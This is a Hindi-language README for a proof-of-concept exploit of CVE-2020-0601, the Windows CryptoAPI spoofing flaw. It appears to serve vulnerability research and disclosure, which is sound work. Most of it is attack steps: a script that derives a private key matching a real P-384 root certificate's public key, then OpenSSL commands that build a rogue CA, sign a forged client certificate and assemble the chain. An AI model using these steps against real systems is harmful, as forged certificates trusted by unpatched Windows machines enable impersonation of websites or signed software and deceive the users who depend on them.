
CVE-2020-0601 Windows CryptoAPI स्पूफिंग भेद्यता के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो एलिप्टिक कर्व कुंजी हेरफेर का उपयोग करके फर्जी CA प्रमाणपत्र निर्माण प्रदर्शित करता है।
CVE-2020-0601: विंडोज़ CryptoAPI स्पूफिंग भेद्यता शोषण। हमारे ब्लॉग पोस्ट में अधिक जानकारी।
pip install -U -r requirements.txt
प्रमाणपत्र निर्माण OpenSSL संस्करण 1.0.2u तक काम करता है।
हमने USERTrust ECC प्रमाणन प्राधिकरण का उपयोग किया लेकिन यह P-384 वक्र पर काम करने वाला कोई भी रूट प्रमाणपत्र हो सकता है।
रूट प्रमाणपत्र से सार्वजनिक कुंजी से मेल खाने वाली निजी कुंजी उत्पन्न करने के लिए हमने स्क्रिप्ट gen-key.py का उपयोग किया (Python 3.6 और उससे ऊपर पर काम करता है):
$ ./gen-key.py RootCert.pem
कुंजी को इसके साथ प्रदर्शित किया जा सकता है:
$ openssl ec -in p384-key-rogue.pem -text
फिर रोग CA उत्पन्न करने के लिए:
$ openssl req -key p384-key-rogue.pem -new -out ca-rogue.pem -x509 -config ca.cnf -days 500
फिर हम निम्नलिखित निजी कुंजी और प्रमाणपत्र उत्पन्न करते हैं:
openssl ecparam -name prime256v1 -genkey -noout -out prime256v1-privkey.pem
openssl req -key prime256v1-privkey.pem -config openssl.cnf -new -out prime256v1.csr
openssl x509 -req -in prime256v1.csr -CA ca-rogue.pem -CAkey p384-key-rogue.pem -CAcreateserial -out client-cert.pem -days 500 -extensions v3_req -extfile openssl.cnf
अंत में एक फ़ाइल में पूर्ण श्रृंखला प्राप्त करने के लिए हम CA और सर्वर प्रमाणपत्रों को जोड़ते हैं:
cat client-cert.pem ca-rogue.pem > cert.pem